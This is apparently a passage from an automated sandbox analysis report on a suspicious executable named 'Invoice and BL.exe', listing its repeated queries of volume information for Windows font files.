            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
